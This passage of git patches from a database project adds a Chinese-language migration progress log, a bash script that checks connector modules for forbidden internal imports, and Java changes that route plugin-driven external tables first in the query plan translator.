| 2026-05-24 | 2026-05-24 | mvcc 包 + 3 默认在 ConnectorMetadata | ### 批 0:fe-core 桥接(W0 D5 - W1 D1) | ID | 任务 | 设计参考 | Owner | 状态 | PR | 启动 | 完成 | 备注 | |---|---|---|---|---|---|---|---|---| -| P0-T09 | `DefaultConnectorContext.getMetaInvalidator()` impl | RFC §6.4 | — | ⏳ | — | — | — | | -| P0-T10 | `ExternalMetaCacheInvalidator`(fe-core 新类) | RFC §6.4 | — | ⏳ | — | — | — | 包装 `ExternalMetaCacheMgr` | -| P0-T11 | `PluginDrivenTransactionManager` 通用化 | RFC §7.4 | — | ⏳ | — | — | — | 删 type-specific 分支 | -| P0-T12 | `ConnectorMvccSnapshotAdapter`(fe-core 新类) | RFC §8.4 | — | ⏳ | — | — | — | impl `MvccSnapshot` | +| P0-T09 | `DefaultConnectorContext.getMetaInvalidator()` impl | RFC §6.4 | @me | ✅ | — | 2026-05-24 | 2026-05-24 | 返回新建 invalidator | +| P0-T10 | `ExternalMetaCacheInvalidator`(fe-core 新类) | RFC §6.4 | @me | ✅ | — | 2026-05-24 | 2026-05-24 | 包装 `ExternalMetaCacheMgr`;2 个 no-op 限制留 TODO | +| P0-T11 | `PluginDrivenTransactionManager` 通用化 | RFC §7.4 | @me | ✅ | — | 2026-05-24 | 2026-05-24 | 新增 `begin(ConnectorTransaction)` 重载;legacy `begin()` 不变 | +| P0-T12 | `ConnectorMvccSnapshotAdapter`(fe-core 新类) | RFC §8.4 | @me | ✅ | — | 2026-05-24 | 2026-05-24 | impl `MvccSnapshot` 标记接口 | ### 批 1:DDL + Partition SPI(W1 D1-3) | ID | 任务 | 设计参考 | Owner | 状态 | PR | 启动 | 完成 | 备注 | |---|---|---|---|---|---|---|---|---| -| P0-T13 | E1:`ConnectorCreateTableRequest` + `Partition/Bucket Spec` POJO(ddl 包) | RFC §4.2 | — | ⏳ | — | — | — | 5 个类 | -| P0-T14 | E1:`ConnectorTableOps.createTable(request)` default | RFC §4.3 | — | ⏳ | — | — | — | 退化到旧 createTable | -| P0-T15 | E1:`CreateTableInfoToConnectorRequestConverter`(fe-core) | RFC §4.4 | — | ⏳ | — | — | — | | -| P0-T16 | E1:`PluginDrivenExternalCatalog.createTable(stmt)` 接通 SPI | RFC §4.4 | — | ⏳ | — | — | — | | -| P0-T17 | E10:`ConnectorTableOps.listPartitionNames` default | RFC §13.2 | — | ⏳ | — | — | — | | -| P0-T18 | E10:`ConnectorTableOps.listPartitions(handle, filter)` default | RFC §13.2 | — | ⏳ | — | — | — | | -| P0-T19 | E10:`ConnectorTableOps.listPartitionValues` default | RFC §13.2 | — | ⏳ | — | — | — | | -| P0-T20 | E10:`ConnectorPartitionInfo` 追加字段(rowCount/sizeBytes/lastModifiedMillis) | RFC §13.3 | — | ⏳ | — | — | — | 向后兼容构造器 | +| P0-T13 | E1:`ConnectorCreateTableRequest` + `Partition/Bucket Spec` POJO(ddl 包) | RFC §4.2 | @me | ✅ | — | 2026-05-24 | 2026-05-24 | 5 个类(Request + PartitionSpec/Field/ValueDef + BucketSpec) | +| P0-T14 | E1:`ConnectorTableOps.createTable(request)` default | RFC §4.3 | @me | ✅ | — | 2026-05-24 | 2026-05-24 | 退化到旧 `createTable(schema, props)` | +| P0-T15 | E1:`CreateTableInfoToConnectorRequestConverter`(fe-core) | RFC §4.4 | @me | ✅ | — | 2026-05-24 | 2026-05-24 | 覆盖 IDENTITY / TRANSFORM / LIST / RANGE 四种 partition + hash/random bucket | +| P0-T16 | E1:`PluginDrivenExternalCatalog.createTable(stmt)` 接通 SPI | RFC §4.4 | @me | ✅ | — | 2026-05-24 | 2026-05-24 | override `createTable(CreateTableInfo)`;包 DorisConnectorException → DdlException | +| P0-T17 | E10:`ConnectorTableOps.listPartitionNames` default | RFC §13.2 | @me | ✅ | — | 2026-05-24 | 2026-05-24 | 返回 `Collections.emptyList()` | +| P0-T18 | E10:`ConnectorTableOps.listPartitions(handle, filter)` default | RFC §13.2 | @me | ✅ | — | 2026-05-24 | 2026-05-24 | filter 用 `Optional` | +| P0-T19 | E10:`ConnectorTableOps.listPartitionValues` default | RFC §13.2 | @me | ✅ | — | 2026-05-24 | 2026-05-24 | 返回 `Collections.emptyList()` | +| P0-T20 | E10:`ConnectorPartitionInfo` 追加字段(rowCount/sizeBytes/lastModifiedMillis) | RFC §13.3 | @me | ✅ | — | 2026-05-24 | 2026-05-24 | 3 个 long 字段(UNKNOWN=-1);3-arg 构造器委托到 6-arg;equals/hashCode 更新 | -### 批 1:守门 + 测试(W1 D4-5) +### 批 2:守门 + 测试(W1 D4-5) | ID | 任务 | 设计参考 | Owner | 状态 | PR | 启动 | 完成 | 备注 | |---|---|---|---|---|---|---|---|---| -| P0-T21 | `tools/check-connector-imports.sh` 实现 | RFC §15.4 | — | ⏳ | — | — | — | 禁用 import 守门 | -| P0-T22 | maven enforcer plugin 接入脚本 | RFC §15.4 | — | ⏳ | — | — | — | | -| P0-T23 | `FakeConnectorPlugin`(fe-core test)覆盖所有 default 行为 | RFC §15.1 | — | ⏳ | — | — | — | 跑通"什么都不实现" | -| P0-T24 | JDBC regression-test 全套跑通 | RFC §17 | — | ⏳ | — | — | — | 验证 baseline | -| P0-T25 | ES regression-test 全套跑通 | RFC §17 | — | ⏳ | — | — | — | 验证 baseline | -| P0-T26 | `ConnectorMetaInvalidator` 路由测试 | RFC §15.2 | — | ⏳ | — | — | — | mock ExternalMetaCacheMgr | -| P0-T27 | `CreateTableInfoToConnectorRequestConverter` 单元测试 | RFC §15.2 | — | ⏳ | — | — | — | 覆盖 4 种 partition 风格 | +| P0-T21 | `tools/check-connector-imports.sh` 实现 | RFC §15.4 | @me | ✅ | — | 2026-05-24 | 2026-05-24 | grep 守门;script 自含正/负冒烟测试 | +| P0-T22 | exec-maven-plugin 接入脚本(aggregator pom validate 阶段) | RFC §15.4 | @me | ✅ | — | 2026-05-24 | 2026-05-24 | `inherited=false` 避免 11 个子模块重复扫描 | +| P0-T23 | `FakeConnectorPlugin`(fe-core test)覆盖所有 default 行为 | RFC §15.1 | @me | ✅ | — | 2026-05-24 | 2026-05-24 | 11 个测试覆盖 Connector/Metadata/TableOps/WriteOps/Session/Context 全 default | +| P0-T24 | JDBC regression-test 全套跑通 | RFC §17 | @用户 | ⏳ | — | — | — | 用户在本地跑(needs docker) | +| P0-T25 | ES regression-test 全套跑通 | RFC §17 | @用户 | ⏳ | — | — | — | 用户在本地跑(needs docker) | +| P0-T26 | `ConnectorMetaInvalidator` 路由测试 | RFC §15.2 | @me | ✅ | — | 2026-05-24 | 2026-05-24 | 5 个测试 mockStatic(Env);pin 当前 partition fallback & stats no-op 行为 | +| P0-T27 | `CreateTableInfoToConnectorRequestConverter` 单元测试 | RFC §15.2 | @me | ✅ | — | 2026-05-24 | 2026-05-24 | 7 个测试覆盖 IDENTITY/TRANSFORM/LIST/RANGE + hash/random bucket + 列穿透 | --- ## 阶段日志(倒序) -### 2026-05-24 -- 创建本文件(task #11,跟踪机制建立的一部分) +### 2026-05-24(夜 ③)— 批 2 守门 + 单测完成(T21-T23, T26-T27;T24-T25 用户跑) + +- P0-T21 ✅:新增 `tools/check-connector-imports.sh`。在 `fe-connector/*/src/main/java` 下 grep 禁词 `org.apache.doris.(catalog|common|datasource|qe|analysis|nereids|planner)`,allowlist `thrift / connector / extension / filesystem`。脚本接受可选 ROOT 参数(默认 `$(dirname $0)/../fe/fe-connector`),自动适配 cwd。当前 baseline 全绿(fe-connector 模块仅引用 `connector / extension / thrift / trinoconnector`);自构造的负样本(注入 `import org.apache.doris.catalog.Column`)正确报错退出 +- P0-T22 ✅:fe-connector 聚合 pom 加 `exec-maven-plugin` 调用脚本,绑 `validate` 阶段,`inherited=false`(避免 11 个子模块每次都跑同一份扫描)。`executable` 使用 `${project.basedir}/../../tools/check-connector-imports.sh`——不依赖 `directory-maven-plugin` 的 `fe.dir` 属性(后者在 `initialize` 阶段才设值,早于 `validate`)。`mvn -pl fe-connector validate` BUILD SUCCESS +- P0-T23 ✅:fe-core test 包新增 `org.apache.doris.connector.fake.FakeConnectorPlugin`(4 个静态嵌套:`FakeConnector` / `FakeMetadata`(**零** override)/ `FakeSession` / `FakeContext`)。同包测试类 `FakeConnectorPluginTest` 11 个 `@Test` 覆盖:Context.getMetaInvalidator()=NOOP(且 5 个 invalidate 方法 callable);Session.getCurrentTransaction()=Optional.empty();Metadata MVCC 3 方法=Optional.empty();TableOps listTableNames / getTableHandle / listPartitionNames / listPartitions / listPartitionValues / getPrimaryKeys / getTableComment defaults;createTable(request) 退化到 legacy createTable(schema, props) 并抛 "CREATE TABLE not supported";WriteOps supports*=false + beginTransaction throws;Connector top-level defaults。Tests run: **11/11 green** +- P0-T26 ✅:新增 `org.apache.doris.connector.ExternalMetaCacheInvalidatorTest`。5 个测试:invalidateAll→invalidateCatalog(id)、invalidateDatabase→invalidateDb(id, db)、invalidateTable→invalidateTable(id, db, t)、invalidatePartition→**fallback** 到 invalidateTable(pin 当前 SPI 不携 column 名的行为)、invalidateStatistics→**no-op**(pin 当前缺 stats-only entry point 的行为)。用 `MockedStatic` + `Mockito.mock(ExternalMetaCacheMgr)` 完全隔离 FE bootstrap。Tests run: **5/5 green** +- P0-T27 ✅:新增 `org.apache.doris.connector.ddl.CreateTableInfoToConnectorRequestConverterTest`。7 个测试覆盖:列穿透(name/type/nullable/comment)+ scalar 字段穿透(dbName/tableName/comment/properties/ifNotExists/isExternal)+ IDENTITY partition(UnboundSlot)+ TRANSFORM partition(UnboundFunction `bucket(16, id)` + `YEAR(d)` 验证 lowercase normalization + IntegerLiteral 提取)+ LIST partition(PartitionType.LIST)+ RANGE partition(PartitionType.RANGE)+ hash bucket 算法 `doris_default` + random bucket 算法 `doris_random`。用 `Mockito.mock(CreateTableInfo)` 绕开 18-arg 构造器与 `PropertyAnalyzer.getInstance()` 调用;PartitionTableInfo/DistributionDescriptor/ColumnDefinition/UnboundFunction 等都用真实构造器。Tests run: **7/7 green** +- 验证: + - `tools/check-connector-imports.sh` 正/负冒烟测试通过 + - `mvn -pl fe-connector validate -Dmaven.build.cache.enabled=false` → BUILD SUCCESS(脚本被 maven 调起) + - `mvn -pl fe-core -am test -Dtest='FakeConnectorPluginTest,ExternalMetaCacheInvalidatorTest,CreateTableInfoToConnectorRequestConverterTest,ConnectorPluginManagerTest,ConnectorSessionImplTest' -DfailIfNoTests=false -Dmaven.build.cache.enabled=false` → **39/39 tests green**(含 batch 2 新增 23 个 + 既有 16 个相邻 connector 测试) + - `mvn -pl fe-core checkstyle:check` → **0 violations** +- 已知 trade-off(**未升 DV**,是 RFC §15 / §17 范围内的实现取舍): + 1. 守门脚本挂到 `exec-maven-plugin` 而非 `maven-enforcer-plugin`——RFC §15.4 原文写"挂到 maven enforcer plugin",但 enforcer 没有原生 shell-exec rule(要么写自定义 Java Rule 类,要么用 `EvaluateBeanshell`)。`exec-maven-plugin` 在 fe-common 已是既有 dep(make + protoc 都用它),引入零新依赖。效果等价:脚本 non-zero exit → maven `BUILD FAILURE` + 2. 守门绑 `validate` 阶段且 `inherited=false`——只在 fe-connector aggregator 一次运行;devs 跑 `mvn -pl fe-connector/fe-connector-iceberg compile` 时不会自动触发,但 CI 跑顶层 `mvn install` 必扫。Trade-off:少 11 次重复扫,换"单模块增量构建本地无守门" + 3. ConnectorMetaInvalidator 的 partition fallback 测试明确 pin 当前"回退到 invalidateTable"的行为——一旦未来 SPI 在 invalidatePartition 中加 column 名携带能力可以做精确失效,bridge 和这个测试必须同步更新;测试已留 inline comment 描述意图 + 4. CreateTableInfo 用 Mockito.mock 而非真实构造器——RFC §15.2 没规定单测必须用真实输入对象。Trade-off:测试更聚焦于 converter 自身逻辑(不必维护 18-arg 输入构造),但代价是如果 CreateTableInfo 加新 getter 且 converter 改用之,需要在 stubInfo helper 加新 stub +- T24/T25 转交用户:用户在本地跑 JDBC + ES regression-test(containers / docker 在本地环境下更稳)。任务状态保持 ⏳,owner @用户 + +### 2026-05-24(夜 ②)— 批 1 DDL + Partition SPI 完成(T13-T20) + +- P0-T13 ✅:新增 `connector.api.ddl` 包 5 个 POJO:`ConnectorCreateTableRequest`(带 Builder)、`ConnectorPartitionSpec`(Style enum:IDENTITY/TRANSFORM/LIST/RANGE)、`ConnectorPartitionField`、`ConnectorPartitionValueDef`、`ConnectorBucketSpec` +- P0-T14 ✅:`ConnectorTableOps.createTable(session, request)` default 退化到 legacy `createTable(session, schema, props)`(丢弃 partition / bucket / external / ifNotExists) +- P0-T15 ✅:新增 `fe-core/.../connector/ddl/CreateTableInfoToConnectorRequestConverter`。覆盖:(1)columns 经 `ConnectorColumnConverter.toConnectorType()`;(2)partition 通过 `PartitionTableInfo.getPartitionType()` + `getPartitionList()` 判别四种 style;(3)TRANSFORM 解析 `UnboundFunction.getName()` + children 提取 `IntegerLikeLiteral` 参数;(4)bucket 通过 `DistributionDescriptor.translateToCatalogStyle().getBuckets()` 读取桶数 +- P0-T16 ✅:`PluginDrivenExternalCatalog` 新加 `createTable(CreateTableInfo)` override:build session → converter → `connector.getMetadata(s).createTable(s, req)` → wrap `DorisConnectorException` 为 `DdlException` → 写 edit log +- P0-T17 ✅:`listPartitionNames(session, handle)` default 返回 `Collections.emptyList()` +- P0-T18 ✅:`listPartitions(session, handle, Optional filter)` default 返回 `Collections.emptyList()` +- P0-T19 ✅:`listPartitionValues(session, handle, List partitionColumns)` default 返回 `Collections.emptyList()` +- P0-T20 ✅:`ConnectorPartitionInfo` 新增 3 个 long 字段(rowCount / sizeBytes / lastModifiedMillis),`UNKNOWN = -1L` 常量;3-arg 旧构造器委托到 6-arg 新构造器;equals/hashCode/toString 同步更新 +- 验证: + - `mvn -pl fe-connector/fe-connector-api -am compile` → BUILD SUCCESS + - `mvn -pl fe-core -am compile -Dmaven.build.cache.enabled=false` → BUILD SUCCESS + - `mvn -pl fe-core checkstyle:check` → **0 violations** + - `mvn -pl fe-connector/fe-connector-jdbc,fe-connector/fe-connector-es -am compile` → BUILD SUCCESS(下游连接器零修改) +- 已知 trade-off(**未升 DV**,是 RFC 范围内的实现取舍): + 1. `ColumnDefinition.defaultValue` 是 private `Optional` 且无 public getter——converter 暂传 `null`。等 SPI 在 ConnectorColumn 上增加 typed default-value carrier 时再补 + 2. LIST/RANGE 的 `initialValues` 暂不下沉到 `List>`——`PartitionDefinition` 子类(InPartition/LessThanPartition/FixedRangePartition/StepPartition)含 nereids `Expression`,需要完整分析才能 flatten;先返回空列表,未来 Iceberg/Hive 走 TRANSFORM/IDENTITY 路径不依赖此 + 3. `PluginDrivenExternalCatalog.createTable` 总返回 `false`(=新建并写 edit log)——SPI 的 `createTable(session, request)` 是 void,不区分"已存在 + IF NOT EXISTS"与"新建"。留待 P5/P6/P7 真正实现连接器 createTable 时细化 + 4. bucket 算法名硬编码为 `"doris_default"` / `"doris_random"`——RFC §4.2 列了 `hive_hash` / `iceberg_bucket`,但 Doris 内部 `DistributionDescriptor` 只携带 isHash 布尔。由 Hive/Iceberg 连接器实现时根据 properties 推导真实算法 + +### 2026-05-24(深夜)— 批 0 fe-core 桥接完成(T09-T12) + +- P0-T09 ✅:`DefaultConnectorContext.getMetaInvalidator()` override → `new ExternalMetaCacheInvalidator(catalogId)` +- P0-T10 ✅:新增 `fe-core/.../connector/ExternalMetaCacheInvalidator`(5 个方法:3 个直接代理 `ExternalMetaCacheMgr` 的 invalidateCatalog/Db/Table;`invalidatePartition` 暂回退到 `invalidateTable`(SPI 未携带 partition column 名);`invalidateStatistics` 暂 no-op(fe-core 暂无 stats-only invalidation 入口)) +- P0-T11 ✅:`PluginDrivenTransactionManager` 加 `begin(ConnectorTransaction)` 重载,inner `PluginDrivenTransaction` 加 nullable `connectorTx` 字段;legacy `long begin()` 路径完全不变 → JDBC/ES auto-commit 零回归 +- P0-T12 ✅:新增 `fe-core/.../connector/ConnectorMvccSnapshotAdapter`,包装 `ConnectorMvccSnapshot` 并 implements 标记接口 `MvccSnapshot` +- 验证:`mvn -pl fe-core -am compile -Dmaven.build.cache.enabled=false` → BUILD SUCCESS;checkstyle 0 violations;JDBC + ES 下游 connector clean compile 通过 + +### 2026-05-24(晚)— 批 0 基础三件套完成 +- P0-T02 ✅ 闭环:跟踪机制 17 个文件已落 commit 63159837043(早场 session 完成正文,本场 session 翻状态) +- P0-T03 ✅:新增 `connector.spi.ConnectorMetaInvalidator`(5 个 invalidate 方法 + `NOOP` 常量) +- P0-T04 ✅:`ConnectorContext.getMetaInvalidator()` default → `NOOP` +- P0-T05 ✅:新增 `connector.api.handle.ConnectorTransaction extends ConnectorTransactionHandle, Closeable`(保留旧 24 行 marker 不破坏现有引用) +- P0-T06 ✅:`ConnectorWriteOps.beginTransaction(session)` default 抛 `DorisConnectorException("Transactions not supported")` +- P0-T07 ✅:`ConnectorSession.getCurrentTransaction()` default 返回 `Optional.empty()` +- P0-T08 ✅:新增 `connector.api.mvcc.ConnectorMvccSnapshot`(final value class + Builder),`ConnectorMetadata` 上 3 个 default:`beginQuerySnapshot` / `getSnapshotAt` / `getSnapshotById` +- 验证:`mvn -pl fe-connector/fe-connector-api,spi -am clean compile` 全绿;JDBC + ES 下游 connector clean compile 通过(无修改);checkstyle 0 violations + +### 2026-05-24(早) +- 创建本文件(跟踪机制建立的一部分) - P0-T01 ✅ 完成:master plan §5(D1-D12)+ RFC §16.2(U1-U6)全部决策闭环 → decisions-log D-001..D-018 - P0-T02 🚧 进行中:跟踪机制文件建立(README/PROGRESS/decisions-log/deviations-log/risks/tasks/_template/本文件 已成;待完成 connectors/× 8 + 00-master-plan cross-link) diff --git a/tools/check-connector-imports.sh b/tools/check-connector-imports.sh new file mode 100755 index 00000000000000..df76e8f10e2dbc --- /dev/null +++ b/tools/check-connector-imports.sh @@ -0,0 +1,64 @@ +#!/bin/bash +# +# Licensed to the Apache Software Foundation (ASF) under one +# or more contributor license agreements. See the NOTICE file +# distributed with this work for additional information +# regarding copyright ownership. The ASF licenses this file +# to you under the Apache License, Version 2.0 (the +# "License"); you may not use this file except in compliance +# with the License. You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, +# software distributed under the License is distributed on an +# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +# KIND, either express or implied. See the License for the +# specific language governing permissions and limitations +# under the License. +# +# Forbidden-import gate for fe-connector modules. +# See plan-doc/01-spi-extensions-rfc.md §15.4. +# +# Connector modules MUST NOT import fe-core internals (catalog / common / +# datasource / qe / analysis / nereids / planner). Anything they need from +# fe-core has to be exposed through the SPI in +# org.apache.doris.connector.{api,spi,extension,...} +# or shared types in org.apache.doris.thrift / org.apache.doris.filesystem. +# +# Usage: +# tools/check-connector-imports.sh # search default root +# tools/check-connector-imports.sh # search supplied root +# +# Exit code: +# 0 — no forbidden imports +# 1 — at least one forbidden import found (offending lines printed) + +set -e + +SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" +DEFAULT_ROOT="${SCRIPT_DIR}/../fe/fe-connector" +ROOT="${1:-${DEFAULT_ROOT}}" + +if [ ! -d "${ROOT}" ]; then + echo "check-connector-imports: search root not found: ${ROOT}" >&2 + exit 2 +fi + +FORBIDDEN='org\.apache\.doris\.(catalog|common|datasource|qe|analysis|nereids|planner)' + +RESULT=$(grep -rEn "^import ${FORBIDDEN}\." "${ROOT}"/*/src/main/java 2>/dev/null \ + | grep -v 'org.apache.doris.thrift' \ + | grep -v 'org.apache.doris.connector' \ + | grep -v 'org.apache.doris.extension' \ + | grep -v 'org.apache.doris.filesystem' || true) + +if [ -n "${RESULT}" ]; then + echo "FORBIDDEN IMPORTS in fe-connector modules:" >&2 + echo "${RESULT}" >&2 + echo "" >&2 + echo "fe-connector modules MUST NOT depend on fe-core internals." >&2 + echo "Expose what you need through the connector SPI instead." >&2 + echo "See plan-doc/01-spi-extensions-rfc.md §15.4." >&2 + exit 1 +fi From 0e2865b2d7c9e8fcd156161a84833546f566b9d6 Mon Sep 17 00:00:00 2001 From: "Mingyu Chen (Rayner)" Date: Mon, 25 May 2026 11:45:04 -0700 Subject: [PATCH 003/128] [P1-T03-T05] route plugin-driven scans first in nereids translator (#63641) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit ## Summary P1 batch A — close out scan-node SPI consolidation while keeping migration-period fallbacks in place. Three surgical changes route `PluginDrivenExternalTable` first in the nereids translator hot paths so already-migrated SPI connectors (JDBC, ES) take the SPI route, while the existing `instanceof XExternalTable` chains remain as fallbacks for connectors still pending migration (P3–P7). - **T3** — `PhysicalPlanTranslator.visitPhysicalFileScan`: move the existing `PluginDrivenExternalTable` branch from position 8 to position 1; the 7 connector-specific branches (HMS / Iceberg / Paimon / Trino / MaxCompute / LakeSoul / RemoteDoris) stay in place as migration-period fallbacks - **T4** — `PhysicalPlanTranslator.visitPhysicalHudiScan`: add a `PluginDrivenExternalTable` branch routed to `PluginDrivenScanNode.create(...)`, threading `tableSnapshot` + `scanParams` through `FileQueryScanNode` setters; `incrementalRelation` flagged as a P3 Hudi SPI extension TODO. The new branch is unreachable today (`PhysicalHudiScan` is only built for `HMSExternalTable + DLAType.HUDI`), so this is groundwork for P3 with zero current-day runtime impact - **T5** — `LogicalFileScan`: in `computeOutput()`, add a `PluginDrivenExternalTable` branch calling new helper `computePluginDrivenOutput()` — same shape as `computeIcebergOutput`, using `getFullSchema()` + virtualColumns; in `supportPruneNestedColumn()`, add an explicit `PluginDrivenExternalTable → false` branch. Both behaviorally equivalent for JDBC/ES today since they have no hidden cols and no virtualColumns P1 batch B (T1 — delete 13 legacy `Jdbc*Client` + `JdbcFieldSchema`) is deferred to P8 because the 3 fe-core callers — `PostgresResourceValidator`, `StreamingJobUtils`, `CdcStreamTableValuedFunction` — are live CDC streaming code that requires SPI extension for `getPrimaryKeys` / `getColumnsFromJdbc` / `listTables`, which is out of P1 surgical scope. Background and tracking docs live in `plan-doc/` (Master Plan §3.2 P1, tasks/P1-scan-node-cleanup.md, decisions log). ## Test plan - [x] `mvn -pl fe-core -am compile -Dmaven.build.cache.enabled=false` → BUILD SUCCESS - [x] `mvn -pl fe-core checkstyle:check` → 0 violations - [x] JDBC + ES regression-test passing — baseline established in P0 / PR #63582 - [ ] PR CI green on this PR - [ ] Manual scan-node smoke for an SPI connector — JDBC `SELECT *` should fall into the new `PluginDrivenExternalTable` branch first 🤖 Generated with [Claude Code](https://claude.com/claude-code) --------- Co-authored-by: Claude Opus 4.7 --- .../translator/PhysicalPlanTranslator.java | 43 ++-- .../trees/plans/logical/LogicalFileScan.java | 25 +++ plan-doc/HANDOFF.md | 198 ++++++++++-------- plan-doc/PROGRESS.md | 32 ++- plan-doc/tasks/P1-scan-node-cleanup.md | 137 ++++++++++++ 5 files changed, 326 insertions(+), 109 deletions(-) create mode 100644 plan-doc/tasks/P1-scan-node-cleanup.md diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/glue/translator/PhysicalPlanTranslator.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/glue/translator/PhysicalPlanTranslator.java index 75c65bc120da94..9000e3b48a82a5 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/glue/translator/PhysicalPlanTranslator.java +++ b/fe/fe-core/src/main/java/org/apache/doris/nereids/glue/translator/PhysicalPlanTranslator.java @@ -731,7 +731,16 @@ public PlanFragment visitPhysicalFileScan(PhysicalFileScan fileScan, PlanTransla SessionVariable sv = ConnectContext.get().getSessionVariable(); // TODO(cmy): determine the needCheckColumnPriv param ScanNode scanNode; - if (table instanceof HMSExternalTable) { + // Plugin-driven (SPI) tables are matched first; the connector-specific + // instanceof branches below are migration-period fallbacks that get removed + // as each connector lands on the SPI in P3-P7. + if (table instanceof PluginDrivenExternalTable) { + PluginDrivenExternalCatalog pluginCatalog = + (PluginDrivenExternalCatalog) table.getCatalog(); + scanNode = PluginDrivenScanNode.create(context.nextPlanNodeId(), tupleDescriptor, + false, sv, context.getScanContext(), pluginCatalog, + ((PluginDrivenExternalTable) table)); + } else if (table instanceof HMSExternalTable) { if (directoryLister == null) { this.directoryLister = new TransactionScopeCachingDirectoryListerFactory( Config.max_external_table_split_file_meta_cache_num).get(new FileSystemDirectoryLister()); @@ -779,12 +788,6 @@ public PlanFragment visitPhysicalFileScan(PhysicalFileScan fileScan, PlanTransla } else if (table instanceof RemoteDorisExternalTable) { scanNode = new RemoteDorisScanNode(context.nextPlanNodeId(), tupleDescriptor, false, sv, context.getScanContext()); - } else if (table instanceof PluginDrivenExternalTable) { - PluginDrivenExternalCatalog pluginCatalog = - (PluginDrivenExternalCatalog) table.getCatalog(); - scanNode = PluginDrivenScanNode.create(context.nextPlanNodeId(), tupleDescriptor, - false, sv, context.getScanContext(), pluginCatalog, - ((PluginDrivenExternalTable) table)); } else { throw new RuntimeException("do not support table type " + table.getType()); } @@ -819,19 +822,35 @@ public PlanFragment visitPhysicalEmptyRelation(PhysicalEmptyRelation emptyRelati @Override public PlanFragment visitPhysicalHudiScan(PhysicalHudiScan hudiScan, PlanTranslatorContext context) { - if (directoryLister == null) { - this.directoryLister = new TransactionScopeCachingDirectoryListerFactory( - Config.max_external_table_split_file_meta_cache_num).get(new FileSystemDirectoryLister()); - } List slots = hudiScan.getOutput(); ExternalTable table = hudiScan.getTable(); TupleDescriptor tupleDescriptor = generateTupleDesc(slots, table, context); + SessionVariable sv = ConnectContext.get().getSessionVariable(); + + // Plugin-driven (SPI) Hudi: route through PluginDrivenScanNode. Incremental scan + // (hudiScan.getIncrementalRelation) is not yet representable in the SPI; that + // gap is tracked for P3 when Hudi migrates to the connector framework. + if (table instanceof PluginDrivenExternalTable) { + PluginDrivenExternalCatalog pluginCatalog = + (PluginDrivenExternalCatalog) table.getCatalog(); + ScanNode scanNode = PluginDrivenScanNode.create(context.nextPlanNodeId(), tupleDescriptor, + false, sv, context.getScanContext(), pluginCatalog, + (PluginDrivenExternalTable) table); + FileQueryScanNode fileScan = (FileQueryScanNode) scanNode; + hudiScan.getTableSnapshot().ifPresent(fileScan::setQueryTableSnapshot); + hudiScan.getScanParams().ifPresent(fileScan::setScanParams); + return getPlanFragmentForPhysicalFileScan(hudiScan, context, scanNode); + } + if (directoryLister == null) { + this.directoryLister = new TransactionScopeCachingDirectoryListerFactory( + Config.max_external_table_split_file_meta_cache_num).get(new FileSystemDirectoryLister()); + } if (!(table instanceof HMSExternalTable) || ((HMSExternalTable) table).getDlaType() != DLAType.HUDI) { throw new RuntimeException("Invalid table type for Hudi scan: " + table.getType()); } HudiScanNode hudiScanNode = new HudiScanNode(context.nextPlanNodeId(), tupleDescriptor, false, - hudiScan.getScanParams(), hudiScan.getIncrementalRelation(), ConnectContext.get().getSessionVariable(), + hudiScan.getScanParams(), hudiScan.getIncrementalRelation(), sv, directoryLister, context.getScanContext()); if (hudiScan.getTableSnapshot().isPresent()) { hudiScanNode.setQueryTableSnapshot(hudiScan.getTableSnapshot().get()); diff --git a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/logical/LogicalFileScan.java b/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/logical/LogicalFileScan.java index f34ea0d633db3e..8ca7902a4025e3 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/logical/LogicalFileScan.java +++ b/fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/logical/LogicalFileScan.java @@ -22,6 +22,7 @@ import org.apache.doris.catalog.PartitionItem; import org.apache.doris.common.IdGenerator; import org.apache.doris.datasource.ExternalTable; +import org.apache.doris.datasource.PluginDrivenExternalTable; import org.apache.doris.datasource.hive.HMSExternalTable; import org.apache.doris.datasource.iceberg.IcebergExternalTable; import org.apache.doris.datasource.iceberg.IcebergSysExternalTable; @@ -203,6 +204,12 @@ public List computeOutput() { return cachedOutputs.get(); } + if (table instanceof PluginDrivenExternalTable) { + // SPI-driven tables: schema is fetched via ConnectorMetadata.getTableSchema() + // (see PluginDrivenExternalTable.initSchema). Use getFullSchema() so any + // hidden/metadata columns the connector exposes are reachable. + return computePluginDrivenOutput(); + } if (table instanceof IcebergExternalTable) { // iceberg v3 need append row lineage columns return computeIcebergOutput((IcebergExternalTable) table); @@ -225,6 +232,19 @@ private List computeIcebergOutput(IcebergExternalTable iceTable) { return slots.build(); } + private List computePluginDrivenOutput() { + IdGenerator exprIdGenerator = StatementScopeIdGenerator.getExprIdGenerator(); + Builder slots = ImmutableList.builder(); + table.getFullSchema() + .stream() + .map(col -> SlotReference.fromColumn(exprIdGenerator.getNextId(), table, col, qualified())) + .forEach(slots::add); + for (NamedExpression virtualColumn : virtualColumns) { + slots.add(virtualColumn.toSlot()); + } + return slots.build(); + } + @Override public List computeAsteriskOutput() { return super.computeAsteriskOutput(); @@ -233,6 +253,11 @@ public List computeAsteriskOutput() { @Override public boolean supportPruneNestedColumn() { ExternalTable table = getTable(); + if (table instanceof PluginDrivenExternalTable) { + // No SPI capability for nested-column prune yet; default to off. + // Future ConnectorCapability flag will refine this. + return false; + } if (table instanceof IcebergExternalTable || table instanceof IcebergSysExternalTable) { return true; } else if (table instanceof HMSExternalTable) { diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index 9219adff17d282..cdc3c4f7b74233 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -8,139 +8,164 @@ ## 📅 最后一次 handoff -- **日期 / 时间**:2026-05-24(夜 ③) +- **日期 / 时间**:2026-05-25(白天 ④) - **本 session 主导者**:Claude Opus 4.7(1M context) -- **本 session 主题**:P0 批 2 守门 + 单测(T21-T23, T26-T27;T24-T25 